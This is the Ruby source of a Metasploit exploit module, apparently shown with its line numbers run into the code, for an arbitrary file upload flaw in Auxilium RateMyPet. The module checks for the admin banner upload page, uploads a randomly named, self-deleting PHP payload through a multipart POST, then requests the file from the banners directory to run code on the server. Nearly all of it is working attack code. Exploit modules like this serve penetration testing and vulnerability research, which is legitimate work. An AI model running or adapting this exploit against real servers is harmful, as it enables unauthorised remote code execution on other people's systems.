Path: blob/master/modules/exploits/multi/http/auxilium_upload_exec.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::PhpEXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => "Auxilium RateMyPet Arbitrary File Upload Vulnerability",16'Description' => %q{17This module exploits a vulnerability found in Auxilium RateMyPet's. The site18banner uploading feature can be abused to upload an arbitrary file to the web19server, which is accessible in the 'banner' directory, thus allowing remote code20execution.21},22'License' => MSF_LICENSE,23'Author' => [24'DaOne', # Vulnerability discovery25'sinn3r' # Metasploit26],27'References' => [28['OSVDB', '85554'],29['EDB', '21329']30],31'Payload' => {32'BadChars' => "\x00"33},34'Platform' => %w{linux php},35'Targets' => [36[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],37[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]38],39'Privileged' => false,40'DisclosureDate' => '2012-09-14',41'DefaultTarget' => 0,42'Notes' => {43'Reliability' => UNKNOWN_RELIABILITY,44'Stability' => UNKNOWN_STABILITY,45'SideEffects' => UNKNOWN_SIDE_EFFECTS46}47)48)4950register_options(51[52OptString.new('TARGETURI', [true, 'The base directory to the application', '/Auxiliumpetratepro/'])53]54)55end5657def check58uri = target_uri.path59base = File.dirname("#{uri}.")6061res = send_request_raw({62'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")63})64if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/65return Exploit::CheckCode::Detected66else67return Exploit::CheckCode::Safe68end69end7071def upload_exec(base, php_fname, p)72data = Rex::MIME::Message.new73data.add_part('http://', nil, nil, "form-data; name=\"burl\"")74data.add_part('', nil, nil, "form-data; name=\"alt\"")75data.add_part(p, 'text/plain', nil, "form-data; name=\"userfile\"; filename=\"#{php_fname}\"")76data.add_part(' Upload', nil, nil, "form-data; name=\"submitok\"")7778post_data = data.to_s7980print_status("Uploading payload (#{p.length.to_s} bytes)...")81res = send_request_cgi({82'method' => 'POST',83'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),84'ctype' => "multipart/form-data; boundary=#{data.bound}",85'data' => post_data,86})8788if not res89print_error("No response from host")90return91end9293print_status("Requesting '#{php_fname}'...")94res = send_request_raw({ 'uri' => normalize_uri("#{base}/banners/#{php_fname}") })95if res and res.code == 40496print_error("Upload unsuccessful: #{res.code.to_s}")97return98end99100handler101end102103def exploit104uri = normalize_uri(target_uri.path)105uri << '/' if uri[-1, 1] != '/'106base = File.dirname("#{uri}.")107108php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"109110p = get_write_exec_payload(:unlink_self => true)111112upload_exec(base, php_fname, p)113end114end115116117